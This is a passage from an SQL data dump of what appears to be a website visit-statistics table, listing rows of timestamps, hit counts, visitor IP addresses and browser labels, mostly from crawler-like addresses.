41','other'),(236308,1524910279,1,1,0,0,'54.36.148.43','other'),(236309,1524910291,1,1,0,0,'54.36.148.206','other'),(236310,1524910326,1,1,0,0,'54.36.148.190','other'),(236311,1524910664,1,1,0,0,'54.36.149.70','other'),(236312,1524910670,1,1,0,0,'157.55.39.248','other'),(236313,1524910689,1,1,0,0,'54.36.149.107','other'),(236314,1524910771,1,1,0,0,'178.154.171.88','other'),(236315,1524911016,1,1,0,0,'35.226.23.240','other'),(236316,1524911313,1,1,0,0,'54.36.148.91','other'),(236317,1524911553,1,1,0,0,'46.211.99.0','chrome'),(236318,1524911576,1,1,0,0,'54.36.149.90','other'),(236319,1524911655,1,1,0,0,'54.36.148.204','other'),(236320,1524911673,1,1,0,0,'54.36.148.86','other'),(236321,1524911981,1,1,0,0,'54.36.148.42','other'),(236322,1524912019,1,1,0,0,'54.36.148.83','other'),(236323,1524912186,1,1,0,0,'54.36.148.189','other'),(236324,1524912803,1,1,0,0,'54.36.148.102','other'),(236325,1524912901,1,1,0,0,'54.36.148.53','other'),(236326,1524912948,1,1,0,0,'54.36.148.195','other'),(236327,1524913076,1,1,0,0,'54.36.148.122','other'),(236328,1524913127,1,1,0,0,'54.36.149.0','other'),(236329,1524913214,1,1,0,0,'54.36.148.115','other'),(236330,1524913691,1,1,0,0,'54.36.148.250','other'),(236331,1524913750,1,1,0,0,'54.36.149.106','other'),(236332,1524914080,1,1,0,0,'54.36.148.157','other'),(236333,1524914152,1,1,0,0,'54.36.149.80','other'),(236334,1524914181,1,1,0,0,'216.244.66.237','other'),(236335,1524914400,1,1,0,0,'8.29.198.27','other'),(236336,1524914446,1,1,0,0,'54.36.148.160','other'),(236337,1524914493,2,2,0,0,'54.36.148.195','other'),(236338,1524914625,1,1,0,0,'54.36.148.40','other'),(236339,1524915294,1,1,0,0,'54.36.148.20','other'),(236340,1524915320,1,1,0,0,'54.36.149.30','other'),(236341,1524915371,1,1,0,0,'54.36.148.32','other'),(236342,1524915440,1,1,0,0,'54.36.148.248','other'),(236343,1524915586,1,1,0,0,'54.36.148.48','other'),(236344,1524915668,2,2,0,0,'216.244.66.237','other'),(236345,1524915820,1,1,0,0,'54.36.148.243','other'),(236346,1524915901,1,1,0,0,'54.36.149.34','other'),(236347,1524916240,1,0,1,0,'66.249.66.155',''),(236348,1524916468,1,1,0,0,'54.36.149.68','other'),(236349,1524916469,1,1,0,0,'54.36.148.229','other'),(236350,1524916478,1,1,0,0,'54.36.148.80','other'),(236351,1524916703,1,1,0,0,'54.36.148.26','other'),(236352,1524916806,1,1,0,0,'54.36.148.206','other'),(236353,1524916915,2,2,0,0,'216.244.66.237','other'),(236354,1524916963,1,1,0,0,'54.36.149.58','other'),(236355,1524917048,1,1,0,0,'54.36.148.132','other'),(236356,1524917119,1,1,0,0,'54.36.148.77','other'),(236357,1524917163,1,1,0,0,'54.36.148.46','other'),(236358,1524917406,1,1,0,0,'66.249.66.157','chrome'),(236359,1524917497,1,1,0,0,'54.36.148.89','other'),(236360,1524917789,56,56,0,0,'173.212.254.158','other'),(236361,1524918012,1,1,0,0,'54.36.148.137','other'),(236362,1524918060,1,1,0,0,'54.36.148.182','other'),(236363,1524918084,3,3,0,0,'178.154.171.88','other'),(236364,1524918128,1,1,0,0,'107.167.116.55','other'),(236365,1524918303,1,1,0,0,'54.36.149.90','other'),(236366,1524918305,1,1,0,0,'54.36.148.58','other'),(236367,1524918644,1,1,0,0,'54.36.148.162','other'),(236368,1524918647,2,2,0,0,'216.244.66.237','other'),(236369,1524918665,1,1,0,0,'54.36.149.30','other'),(236370,1524918804,1,1,0,0,'54.36.148.35','other'),(236371,1524918916,1,1,0,0,'54.36.149.68','other'),(236372,1524918985,1,1,0,0,'54.36.149.51','other'),(236373,1524919055,1,1,0,0,'141.8.142.74','other'),(236374,1524919553,1,1,0,0,'54.36.148.240','other'),(236375,1524919651,1,1,0,0,'54.36.148.28','other'),(236376,1524919761,1,1,0,0,'54.36.148.223','other'),(236377,1524919771,1,1,0,0,'213.180.203.7','other'),(236378,1524919914,1,1,0,0,'54.36.148.68','other'),(236379,1524919963,1,1,0,0,'216.244.66.237','other'),(236380,1524920135,1,1,0,0,'54.36.149.70','other'),(236381,1524920401,2,2,0,0,'37.54.114.62','chrome'),(236382,1524920709,1,1,0,0,'8.29.198.27','other'),(236383,1524920911,1,1,0,0,'54.36.148.194','other'),(236384,1524921045,1,1,0,0,'54.36.148.107','other'),(236385,1524921057,1,1,0,0,'178.154.171.88','other'),(236386,1524921122,1,1,0,0,'54.36.148.26','other'),(236387,1524921301,1,1,0,0,'46.211.127.213','chrome'),(236388,1524921378,1,1,0,0,'54.36.148.136','other'),(236389,1524921445,4,4,0,0,'216.244.66.237','other'),(236390,1524921459,1,1,0,0,'54.36.149.72','other'),(236391,1524921505,1,1,0,0,'54.36.148.58','other'),(236392,1524921527,1,1,0,0,'54.36.149.22','other'),(236393,1524921734,1,1,0,0,'54.36.148.218','other'),(236394,1524921739,1,1,0,0,'54.36.148.163','other'),(236395,1524921813,1,1,0,0,'54.36.148.229','other'),(236396,1524922033,1,1,0,0,'54.36.149.44','other'),(236397,1524922124,2,2,0,0,'162.210.196.129','other'),(236398,1524922164,1,1,0,0,'54.36.149.96','other'),(236399,1524922454,1,1,0,0,'54.36.148.114','other'),(236400,1524922518,1,1,0,0,'54.36.148.63','other'),(236401,1524922551,1,1,0,0,'54.36.149.101','other'),(236402,1524922554,1,1,0,0,'54.36.148.233','other'),(236403,1524922769,1,1,0,0,'216.244.66.237','other'),(236404,1524922803,1,1,0,0,'54.36.148.137','other'),(236405,1524922886,1,1,0,0,'54.36.149.69','other'),(236406,1524922924,1,1,0,0,'54.36.148.157','other'),(236407,1524923115,1,1,0,0,'54.36.148.39','other'),(236408,1524923202,1,1,0,0,'178.154.171.88','other'),(236409,1524923429,1,1,0,0,'141.8.142.74','other'),(236410,1524923506,1,1,0,0,'54.36.148.29','other'),(236411,1524923944,1,1,0,0,'54.36.149.105','other'),(236412,1524923972,1,1,0,0,'54.36.148.151','other'),(236413,1524924173,1,1,0,0,'54.36.148.102','other'),(236414,1524924203,1,1,0,0,'54.36.148.160','other'),(236415,1524924222,1,1,0,0,'54.36.148.244','other'),(236416,1524924280,3,3,0,0,'216.244.66.237','other'),(236417,1524924308,1,1,0,0,'54.36.149.41','other'),(236418,1524924449,1,1,0,0,'54.36.148.173','other'),(236419,1524924502,1,1,0,0,'40.77.167.15','other'),(236420,1524924551,1,1,0,0,'54.36.148.96','other'),(236421,1524924631,1,1,0,0,'54.36.148.99','other'),(236422,1524924743,1,1,0,0,'54.36.148.157','other'),(236423,1524924978,1,1,0,0,'54.36.149.101','other'),(236424,1524925004,1,1,0,0,'178.255.215.94','other'),(236425,1524925089,1,1,0,0,'54.36.148.46','other'),(236426,1524925106,1,1,0,0,'54.36.149.84','other'),(236427,1524925209,1,1,0,0,'54.36.149.32','other'),(236428,1524925234,1,1,0,0,'8.29.198.27','other'),(236429,1524925349,1,1,0,0,'54.36.148.150','other'),(236430,1524925525,1,1,0,0,'141.8.142.74','other'),(236431,1524925568,1,1,0,0,'54.36.148.39','other'),(236432,1524925836,1,1,0,0,'54.36.148.174','other'),(236433,1524925878,1,1,0,0,'91.185.201.69','chrome'),(236434,1524926346,1,1,0,0,'54.36.148.118','other'),(236435,1524926430,1,1,0,0,'54.36.149.59','other'),(236436,1524926434,1,1,0,0,'54.36.149.71','other'),(236437,1524926435,1,1,0,0,'54.36.148.157','other'),(236438,1524926474,1,1,0,0,'54.36.149.64','other'),(236439,1524926682,1,1,0,0,'54.36.148.147','other'),(236440,1524926919,1,1,0,0,'141.8.142.74','other'),(236441,1524926920,1,1,0,0,'54.36.149.80','other'),(236442,1524926930,2,2,0,0,'54.36.148.16','other'),(236443,1524927113,1,1,0,0,'188.230.43.254','other'),(236444,1524927231,1,1,0,0,'54.36.149.74','other'),(236445,1524927297,1,1,0,0,'54.36.149.94','other'),(236446,1524927497,1,1,0,0,'54.36.148.235','other'),(236447,1524928077,1,1,0,0,'216.244.66.237','other'),(236448,1524928146,1,1,0,0,'54.36.148.214','other'),(236449,1524928508,1,1,0,0,'54.36.148.118','other'),(236450,1524928883,1,1,0,0,'54.36.149.38','other'),(236451,1524928959,1,1,0,0,'54.36.149.68','other'),(236452,1524928970,1,1,0,0,'54.36.148.54','other'),(236453,1524929650,1,1,0,0,'54.36.148.194','other'),(236454,1524929654,1,1,0,0,'216.244.66.237','other'),(236455,1524929735,1,1,0,0,'54.36.148.133','other'),(236456,1524929828,1,1,0,0,'54.36.149.83','other'),(236457,1524930376,1,1,0,0,'54.36.148.141','other'),(236458,1524930480,1,1,0,0,'54.36.148.108','other'),(236459,1524930730,1,1,0,0,'54.36.148.13','other'),(236460,1524930744,1,1,0,0,'54.36.149.64','other'),(236461,1524930860,1,1,0,0,'216.244.66.237','other'),(236462,1524930910,1,1,0,0,'54.36.148.47','other'),(236463,1524931008,1,1,0,0,'54.36.148.191','other'),(236464,1524931030,1,1,0,0,'54.36.148.86','other'),(236465,1524931059,1,1,0,0,'188.230.43.254','other'),(236466,1524931094,1,1,0,0,'54.36.149.77','other'),(236467,1524931189,1,1,0,0,'54.36.148.226','other'),(236468,1524931271,1,1,0,0,'54.36.148.242','other'),(236469,1524931504,1,1,0,0,'54.36.149.50','other'),(236470,1524931543,1,1,0,0,'8.29.198.27','other'),(236471,1524931607,1,1,0,0,'54.36.148.93','other'),(236472,1524931648,1,1,0,0,'54.36.148.208','other'),(236473,1524931943,1,1,0,0,'54.36.148.204','other'),(236474,1524932061,1,1,0,0,'54.36.148.127','other'),(236475,1524932136,2,2,0,0,'216.244.66.237','other'),(236476,1524932206,1,1,0,0,'35.226.23.240','other'),(236477,1524932355,1,1,0,0,'54.36.148.222','other'),(236478,1524932699,1,0,1,0,'66.249.66.156',''),(236479,1524932740,1,1,0,0,'54.36.149.22','other'),(236480,1524933160,1,1,0,0,'54.36.148.143','other'),(236481,1524933419,1,1,0,0,'54.36.148.110','other'),(236482,1524933427,1,1,0,0,'54.36.148.222','other'),(236483,1524933650,1,1,0,0,'54.36.148.180','other'),(236484,1524933741,1,1,0,0,'54.36.148.171','other'),(236485,1524933811,1,1,0,0,'54.36.148.31','other'),(236486,1524933841,2,2,0,0,'216.244.66.237','other'),(236487,1524933946,1,1,0,0,'157.55.39.139','other'),(236488,1524934004,1,1,0,0,'54.36.148.27','other'),(236489,1524934019,1,1,0,0,'54.36.149.86','other'),(236490,1524934342,1,1,0,0,'54.36.148.112','other'),(236491,1524934344,1,1,0,0,'40.77.167.12','other'),(236492,1524934591,1,1,0,0,'54.36.148.255','other'),(236493,1524935370,1,1,0,0,'54.36.148.27','other'),(236494,1524935534,1,1,0,0,'54.36.149.16','other'),(236495,1524935640,1,1,0,0,'54.36.148.43','other'),(236496,1524935757,1,0,1,0,'66.249.66.155',''),(236497,1524935821,1,1,0,0,'54.36.148.224','other'),(236498,1524936071,1,1,0,0,'8.29.198.25','other'),(236499,1524936087,1,1,0,0,'54.36.148.239','other'),(236500,1524936299,1,1,0,0,'54.36.148.184','other'),(236501,1524936438,1,1,0,0,'54.36.149.54','other'),(236502,1524936466,3,3,0,0,'216.244.66.237','other'),(236503,1524936521,1,1,0,0,'66.249.66.75','chrome'),(236504,1524936581,1,1,0,0,'54.36.148.160','other'),(236505,1524936828,1,1,0,0,'178.154.171.88','other'),(236506,1524936832,1,1,0,0,'141.8.142.74','other'),(236507,1524937005,2,2,0,0,'91.196.178.167','chrome'),(236508,1524937143,1,1,0,0,'54.36.149.68','other'),(236509,1524937152,2,2,0,0,'92.113.126.46','chrome'),(236510,1524937313,1,1,0,0,'54.36.149.35','other'),(236511,1524937361,1,1,0,0,'54.36.149.49','other'),(236512,1524937840,1,1,0,0,'54.36.148.71','other'),(236513,1524938260,1,1,0,0,'54.36.148.188','other'),(236514,1524938321,1,1,0,0,'54.36.149.97','other'),(236515,1524938411,1,1,0,0,'66.249.66.157','chrome'),(236516,1524938660,1,1,0,0,'54.36.149.3','other'),(236517,1524938789,1,1,0,0,'54.36.148.190','other'),(236518,1524938797,1,1,0,0,'54.36.149.45','other'),(236519,1524938949,1,1,0,0,'54.36.148.43','other'),(236520,1524938991,1,1,0,0,'54.36.148.240','other'),(236521,1524939185,1,1,0,0,'54.36.148.217','other'),(236522,1524939187,1,1,0,0,'54.36.149.54','other'),(236523,1524939211,1,1,0,0,'54.36.148.250','other'),(236524,1524939261,1,1,0,0,'54.36.149.67','other'),(236525,1524939304,1,1,0,0,'178.154.171.88','other'),(236526,1524939342,18,18,0,0,'195.201.96.246','other'),(236527,1524939412,1,1,0,0,'54.36.149.71','other'),(236528,1524939463,2,2,0,0,'216.244.66.237','other'),(236529,1524939631,1,1,0,0,'54.36.148.119','other'),(236530,1524939663,2,0,2,0,'66.249.66.75',''),(236531,1524939671,1,1,0,0,'54.36.148.97','other'),(236532,1524939820,1,1,0,0,'35.226.23.240','other'),(236533,1524939998,1,1,0,0,'54.36.149.31','other'),(236534,1524940040,1,1,0,0,'54.36.148.110','other'),(236535,1524940082,1,1,0,0,'54.36.148.128','other'),(236536,1524940090,1,1,0,0,'54.36.149.26','other'),(236537,1524940443,1,1,0,0,'54.36.148.121','other'),(236538,1524940479,1,1,0,0,'54.36.148.148','other'),(236539,1524940691,1,0,1,0,'66.249.66.155',''),(236540,1524940780,1,1,0,0,'54.36.149.5','other'),(236541,1524940891,1,1,0,0,'54.36.148.215','other'),(236542,1524940892,1,1,0,0,'54.36.149.36','other'),(236543,1524940919,1,1,0,0,'54.36.148.226','other'),(236544,1524940920,1,1,0,0,'54.36.148.18','other'),(236545,1524940974,1,1,0,0,'54.36.148.100','other'),(236546,1524941022,1,1,0,0,'54.36.148.55','other'),(236547,1524941256,1,1,0,0,'54.36.148.10','other'),(236548,1524941316,1,1,0,0,'54.36.149.72','other'),(236549,1524941442,1,1,0,0,'54.36.149.77','other'),(236550,1524941542,1,1,0,0,'54.36.148.199','other'),(236551,1524942222,1,1,0,0,'216.244.66.237','other'),(236552,1524942340,1,1,0,0,'54.36.149.94','other'),(236553,1524942370,1,1,0,0,'54.36.149.0','other'),(236554,1524942380,1,1,0,0,'8.29.198.26','other'),(236555,1524942384,1,1,0,0,'54.36.149.101','other'),(236556,1524942531,1,1,0,0,'157.55.39.248','other'),(236557,1524942749,1,0,1,0,'66.249.66.155',''),(236558,1524943037,1,1,0,0,'195.10.210.70','chrome'),(236559,1524943056,1,1,0,0,'54.36.149.97','other'),(236560,1524943077,1,1,0,0,'54.36.148.180','other'),(236561,1524943172,1,1,0,0,'54.36.148.158','other'),(236562,1524943374,1,1,0,0,'54.36.148.36','other'),(236563,1524943378,1,1,0,0,'54.36.148.206','other'),(236564,1524943409,1,1,0,0,'54.36.149.18','other'),(236565,1524943512,1,1,0,0,'54.36.148.200','other'),(236566,1524943711,1,1,0,0,'54.36.148.208','other'),(236567,1524943805,1,1,0,0,'54.36.149.58','other'),(236568,1524943928,2,2,0,0,'216.244.66.237','other'),(236569,1524944000,1,1,0,0,'178.154.171.88','other'),(236570,1524944106,2,2,0,0,'37.73.239.175','chrome'),(236571,1524944176,1,1,0,0,'54.36.149.13','other'),(236572,1524944597,1,1,0,0,'54.36.148.102','other'),(236573,1524944876,1,0,1,0,'66.249.66.155',''),(236574,1524945278,1,1,0,0,'54.36.149.103','other'),(236575,1524945364,1,1,0,0,'54.36.148.48','other'),(236576,1524945487,1,1,0,0,'54.36.148.135','other'),(236577,1524945516,1,1,0,0,'54.36.149.18','other'),(236578,1524945881,1,1,0,0,'54.36.148.28','other'),(236579,1524946009,1,1,0,0,'54.36.148.223','other'),(236580,1524946041,1,1,0,0,'141.8.142.74','other'),(236581,1524946091,1,1,0,0,'54.36.148.247','other'),(236582,1524946108,1,1,0,0,'54.36.148.59','other'),(236583,1524946201,2,0,2,0,'66.249.66.157',''),(236584,1524946583,1,1,0,0,'54.36.148.53','other'),(236585,1524946640,1,1,0,0,'54.36.149.72','other'),(236586,1524946901,1,1,0,0,'8.29.198.27','other'),(236587,1524947014,1,1,0,0,'54.36.148.189','other'),(236588,1524947082,1,1,0,0,'141.8.142.74','other'),(236589,1524947115,1,1,0,0,'188.163.49.154','chrome'),(236590,1524947116,1,1,0,0,'93.190.40.60','chrome'),(236591,1524947198,1,1,0,0,'54.36.149.4','other'),(236592,1524947359,3,0,3,0,'66.249.66.157',''),(236593,1524947475,1,1,0,0,'54.36.149.73','other'),(236594,1524947594,1,1,0,0,'54.36.148.140','other'),(236595,1524947722,1,1,0,0,'54.36.149.83','other'),(236596,1524947747,1,1,0,0,'54.36.149.99','other'),(236597,1524947755,1,1,0,0,'54.36.149.103','other'),(236598,1524947893,1,1,0,0,'54.36.148.198','other'),(236599,1524948008,1,1,0,0,'54.36.149.93','other'),(236600,1524948014,1,1,0,0,'54.36.148.72','other'),(236601,1524948212,2,2,0,0,'216.244.66.237','other'),(236602,1524948292,1,1,0,0,'54.36.148.188','other'),(236603,1524948601,1,1,0,0,'54.36.148.224','other'),(236604,1524949225,1,1,0,0,'178.154.171.88','other'),(236605,1524949447,1,1,0,0,'54.36.148.77','other'),(236606,1524949806,1,1,0,0,'91.209.11.236','other'),(236607,1524949861,1,1,0,0,'54.36.148.60','other'),(236608,1524950041,1,1,0,0,'54.36.148.52','other'),(236609,1524950184,1,1,0,0,'54.36.149.72','other'),(236610,1524950227,1,1,0,0,'54.36.149.30','other'),(236611,1524950422,1,1,0,0,'54.36.149.75','other'),(236612,1524950468,1,1,0,0,'54.36.149.62','other'),(236613,1524950570,1,1,0,0,'54.36.148.151','other'),(236614,1524950609,1,1,0,0,'54.36.148.166','other'),(236615,1524950712,1,1,0,0,'141.8.142.74','other'),(236616,1524950739,1,1,0,0,'37.9.113.182','other'),(236617,1524951047,1,1,0,0,'216.244.66.237','other'),(236618,1524951091,1,1,0,0,'54.36.148.57','other'),(236619,1524951155,1,0,1,0,'66.249.66.157',''),(236620,1524951493,1,1,0,0,'54.36.149.47','other'),(236621,1524951760,1,1,0,0,'54.36.148.247','other'),(236622,1524951938,1,1,0,0,'54.36.148.76','other'),(236623,1524952126,1,1,0,0,'54.36.148.116','other'),(236624,1524952398,1,1,0,0,'216.244.66.237','other'),(236625,1524952464,1,1,0,0,'141.8.142.74','other'),(236626,1524952596,1,0,1,0,'66.249.66.155',''),(236627,1524952633,1,1,0,0,'54.36.148.205','other'),(236628,1524952807,1,1,0,0,'54.36.148.187','other'),(236629,1524952895,1,1,0,0,'66.249.66.76','chrome'),(236630,1524953188,1,1,0,0,'54.36.149.30','other'),(236631,1524953203,2,0,2,0,'66.249.66.156',''),(236632,1524953210,1,1,0,0,'8.29.198.27','other'),(236633,1524953737,1,1,0,0,'54.36.149.63','other'),(236634,1524954034,1,1,0,0,'54.36.149.3','other'),(236635,1524954108,1,1,0,0,'141.8.142.74','other'),(236636,1524954851,1,1,0,0,'40.77.167.58','other'),(236637,1524954960,1,1,0,0,'54.36.148.56','other'),(236638,1524955019,1,1,0,0,'141.8.142.74','other'),(236639,1524955094,1,1,0,0,'217.69.133.217','other'),(236640,1524955096,1,1,0,0,'216.244.66.237','other'),(236641,1524955217,1,1,0,0,'54.36.148.163','other'),(236642,1524955235,1,1,0,0,'54.36.148.201','other'),(236643,1524955400,1,1,0,0,'54.36.149.34','other'),(236644,1524955482,1,1,0,0,'54.36.148.225','other'),(236645,1524955990,1,0,1,0,'66.249.66.157',''),(236646,1524956015,1,0,1,0,'66.249.66.156',''),(236647,1524956043,1,1,0,0,'54.36.148.35','other'),(236648,1524956081,1,1,0,0,'91.209.11.236','other'),(236649,1524956230,1,1,0,0,'54.36.149.66','other'),(236650,1524956248,1,1,0,0,'54.36.148.17','other'),(236651,1524956255,1,1,0,0,'54.36.148.137','other'),(236652,1524956337,1,1,0,0,'54.36.148.131','other'),(236653,1524956499,1,1,0,0,'54.36.148.158','other'),(236654,1524956612,1,1,0,0,'54.36.149.48','other'),(236655,1524956633,1,1,0,0,'141.8.142.74','other'),(236656,1524956996,1,1,0,0,'54.36.148.171','other'),(236657,1524956999,1,1,0,0,'54.36.148.41','other'),(236658,1524957006,1,1,0,0,'54.36.149.42','other'),(236659,1524957331,1,1,0,0,'54.36.148.234','other'),(236660,1524957725,1,1,0,0,'54.36.148.49','other'),(236661,1524957727,1,1,0,0,'8.29.198.26','other'),(236662,1524958026,1,1,0,0,'54.36.148.35','other'),(236663,1524958201,1,0,1,0,'66.249.66.155',''),(236664,1524958372,1,0,1,0,'66.249.66.156',''),(236665,1524958566,1,1,0,0,'54.36.148.38','other'),(236666,1524958945,1,1,0,0,'54.36.149.29','other'),(236667,1524959363,1,1,0,0,'54.36.149.62','other'),(236668,1524959461,1,0,1,0,'66.249.66.155',''),(236669,1524959519,1,1,0,0,'54.36.148.192','other'),(236670,1524959629,1,1,0,0,'54.36.148.252','other'),(236671,1524959748,12,12,0,0,'23.237.4.26','other'),(236672,1524959897,1,1,0,0,'54.36.148.243','other'),(236673,1524960236,1,1,0,0,'178.154.171.88','other'),(236674,1524960729,1,1,0,0,'54.36.149.86','other'),(236675,1524960915,1,1,0,0,'141.8.142.74','other'),(236676,1524961033,1,1,0,0,'54.36.148.245','other'),(236677,1524961103,1,1,0,0,'216.244.66.237','other'),(236678,1524961181,1,1,0,0,'54.36.148.130','other'),(236679,1524961253,1,1,0,0,'54.36.148.139','other'),(236680,1524961636,1,1,0,0,'54.36.149.39','other'),(236681,1524961783,1,1,0,0,'66.249.66.76','chrome'),(236682,1524961815,1,1,0,0,'66.249.66.155','chrome'),(236683,1524961834,1,1,0,0,'54.36.149.6','other'),(236684,1524961913,1,1,0,0,'54.36.149.2','other'),(236685,1524961928,1,1,0,0,'54.36.149.68','other'),(236686,1524962120,1,1,0,0,'216.244.66.237','other'),(236687,1524962147,1,1,0,0,'54.36.148.197','other'),(236688,1524962393,1,1,0,0,'54.36.149.44','other'),(236689,1524962571,1,1,0,0,'54.36.149.19','other'),(236690,1524962825,1,1,0,0,'54.36.148.192','other'),(236691,1524963141,1,0,1,0,'66.249.66.155',''),(236692,1524963869,1,1,0,0,'54.36.148.155','other'),(236693,1524964020,1,1,0,0,'54.36.148.48','other'),(236694,1524964044,1,1,0,0,'8.29.198.26','other'),(236695,1524964853,1,1,0,0,'54.36.148.40','other'),(236696,1524965077,1,1,0,0,'54.36.148.184','other'),(236697,1524965293,1,1,0,0,'54.36.148.72','other'),(236698,1524965364,2,2,0,0,'141.8.142.74','other'),(236699,1524965633,1,1,0,0,'40.77.167.15','other'),(236700,1524965875,1,0,1,0,'66.249.66.157',''),(236701,1524965894,1,0,1,0,'66.249.66.74',''),(236702,1524965910,1,1,0,0,'54.36.148.34','other'),(236703,1524965964,2,0,2,0,'66.249.66.156',''),(236704,1524966103,1,1,0,0,'66.249.66.76','chrome'),(236705,1524966104,1,1,0,0,'66.249.66.155','chrome'),(236706,1524966164,1,1,0,0,'54.36.148.71','other'),(236707,1524966300,1,1,0,0,'54.36.148.204','other'),(236708,1524966382,1,1,0,0,'54.36.149.67','other'),(236709,1524966612,1,1,0,0,'35.226.23.240','other'),(236710,1524966921,1,0,1,0,'66.249.66.156',''),(236711,1524967036,1,1,0,0,'54.36.149.69','other'),(236712,1524967042,2,0,2,0,'66.249.66.155',''),(236713,1524967183,1,1,0,0,'216.244.66.237','other'),(236714,1524967286,1,1,0,0,'54.36.148.68','other'),(236715,1524967354,1,1,0,0,'54.36.148.96','other'),(236716,1524967434,1,1,0,0,'54.36.148.154','other'),(236717,1524967659,1,1,0,0,'54.36.148.106','other'),(236718,1524967959,1,1,0,0,'141.8.142.74','other'),(236719,1524968277,2,0,2,0,'66.249.66.156',''),(236720,1524968279,1,1,0,0,'54.36.149.66','other'),(236721,1524968557,1,1,0,0,'8.29.198.26','other'),(236722,1524968639,1,1,0,0,'178.154.171.88','other'),(236723,1524968715,1,1,0,0,'54.36.148.26','other'),(236724,1524968815,2,0,2,0,'66.249.66.155',''),(236725,1524969257,1,1,0,0,'54.36.149.15','other'),(236726,1524969806,1,1,0,0,'54.36.148.220','other'),(236727,1524969831,1,1,0,0,'54.36.148.106','other'),(236728,1524969883,1,1,0,0,'54.36.148.51','other'),(236729,1524970099,1,1,0,0,'54.36.149.96','other'),(236730,1524970271,1,1,0,0,'54.36.148.162','other'),(236731,1524970299,1,1,0,0,'54.36.148.189','other'),(236732,1524970332,1,1,0,0,'54.36.148.25','other'),(236733,1524970603,1,1,0,0,'54.36.148.89','other'),(236734,1524970604,1,1,0,0,'54.36.148.10','other'),(236735,1524970734,1,1,0,0,'54.36.148.128','other'),(236736,1524970769,1,1,0,0,'54.36.148.26','other'),(236737,1524970894,1,1,0,0,'54.36.149.54','other'),(236738,1524971174,1,1,0,0,'66.249.66.75','chrome'),(236739,1524971180,1,1,0,0,'66.249.66.155','chrome'),(236740,1524971253,1,1,0,0,'178.154.171.88','other'),(236741,1524971278,1,1,0,0,'54.36.149.87','other'),(236742,1524971322,1,1,0,0,'54.36.149.76','other'),(236743,1524971484,1,1,0,0,'54.36.148.34','other'),(236744,1524971673,1,1,0,0,'54.36.148.19','other'),(236745,1524971677,1,1,0,0,'54.36.149.90','other'),(236746,1524971761,1,1,0,0,'54.36.149.95','other'),(236747,1524972358,1,1,0,0,'54.36.148.114','other'),(236748,1524972443,1,0,1,0,'66.249.66.157',''),(236749,1524972452,1,0,1,0,'66.249.66.74',''),(236750,1524972773,1,1,0,0,'54.36.148.217','other'),(236751,1524972872,1,1,0,0,'54.36.148.231','other'),(236752,1524973014,2,0,2,0,'66.249.66.155',''),(236753,1524973139,1,1,0,0,'54.36.148.11','other'),(236754,1524973148,1,1,0,0,'54.36.148.150','other'),(236755,1524973333,1,1,0,0,'54.36.149.59','other'),(236756,1524973664,33,33,0,0,'195.201.140.249','other'),(236757,1524974006,1,1,0,0,'54.36.148.157','other'),(236758,1524974119,1,1,0,0,'54.36.148.141','other'),(236759,1524974324,2,2,0,0,'216.244.66.237','other'),(236760,1524974407,1,1,0,0,'193.106.30.99','firefox'),(236761,1524974575,1,1,0,0,'54.36.149.35','other'),(236762,1524974704,1,1,0,0,'35.226.23.240','other'),(236763,1524974726,1,1,0,0,'40.77.167.84','other'),(236764,1524974841,1,1,0,0,'54.36.148.182','other'),(236765,1524974871,1,1,0,0,'8.29.198.26','other'),(236766,1524975040,1,1,0,0,'54.36.148.235','other'),(236767,1524975042,1,1,0,0,'54.36.148.194','other'),(236768,1524975095,1,1,0,0,'54.36.148.22','other'),(236769,1524975192,1,1,0,0,'54.36.148.137','other'),(236770,1524975436,1,1,0,0,'66.249.66.76','chrome'),(236771,1524975437,1,1,0,0,'66.249.66.157','chrome'),(236772,1524975451,1,1,0,0,'54.36.148.90','other'),(236773,1524975658,1,1,0,0,'54.36.148.164','other'),(236774,1524975845,1,1,0,0,'54.36.148.198','other'),(236775,1524976061,1,1,0,0,'54.36.149.78','other'),(236776,1524976086,1,0,1,0,'66.249.66.156',''),(236777,1524976162,1,1,0,0,'54.36.149.9','other'),(236778,1524976429,1,1,0,0,'54.36.148.233','other'),(236779,1524976548,2,2,0,0,'54.36.148.180','other'),(236780,1524976766,1,1,0,0,'54.36.149.64','other'),(236781,1524976785,1,1,0,0,'54.36.148.71','other'),(236782,1524977030,3,3,0,0,'216.244.66.237','other'),(236783,1524977296,1,0,1,0,'66.249.66.156',''),(236784,1524977313,1,1,0,0,'54.36.148.225','other'),(236785,1524977357,1,1,0,0,'54.36.148.22','other'),(236786,1524977414,2,0,2,0,'66.249.66.157',''),(236787,1524977535,1,1,0,0,'54.36.148.95','other'),(236788,1524977600,1,1,0,0,'54.36.148.111','other'),(236789,1524977682,1,0,1,0,'66.249.66.155',''),(236790,1524977868,2,2,0,0,'54.36.149.51','other'),(236791,1524977941,1,1,0,0,'141.8.142.74','other'),(236792,1524977976,1,0,1,0,'66.249.66.74',''),(236793,1524978134,1,1,0,0,'54.36.149.57','other'),(236794,1524978147,1,1,0,0,'87.250.224.46','other'),(236795,1524978370,1,1,0,0,'54.36.148.150','other'),(236796,1524978499,1,1,0,0,'54.36.149.78','other'),(236797,1524978577,1,1,0,0,'54.36.148.229','other'),(236798,1524978636,1,0,1,0,'66.249.66.157',''),(236799,1524978766,1,1,0,0,'54.36.149.23','other'),(236800,1524979204,1,1,0,0,'54.36.148.181','other'),(236801,1524979216,1,1,0,0,'54.36.148.23','other'),(236802,1524979248,2,1,1,0,'66.249.66.156',''),(236803,1524979250,1,1,0,0,'66.249.66.76','chrome'),(236804,1524979386,1,1,0,0,'8.29.198.26','other'),(236805,1524979571,1,1,0,0,'54.36.148.46','other'),(236806,1524979624,1,1,0,0,'54.36.148.232','other'),(236807,1524979705,2,2,0,0,'91.196.178.100','chrome'),(236808,1524980119,1,1,0,0,'54.36.148.17','other'),(236809,1524980303,1,1,0,0,'141.8.142.74','other'),(236810,1524980416,1,1,0,0,'54.36.148.241','other'),(236811,1524980448,1,1,0,0,'54.36.149.73','other'),(236812,1524980752,1,1,0,0,'87.250.224.46','other'),(236813,1524981180,1,1,0,0,'54.36.149.27','other'),(236814,1524981304,1,1,0,0,'54.36.148.102','other'),(236815,1524981402,1,0,1,0,'66.249.66.156',''),(236816,1524981666,1,1,0,0,'54.36.148.128','other'),(236817,1524981710,1,1,0,0,'87.250.224.46','other'),(236818,1524981804,1,1,0,0,'54.36.148.73','other'),(236819,1524981815,1,0,1,0,'66.249.66.157',''),(236820,1524981959,1,1,0,0,'216.244.66.237','other'),(236821,1524982778,1,1,0,0,'54.36.148.219','other'),(236822,1524983488,1,1,0,0,'54.36.148.139','other'),(236823,1524983721,1,1,0,0,'54.36.149.80','other'),(236824,1524983778,1,0,1,0,'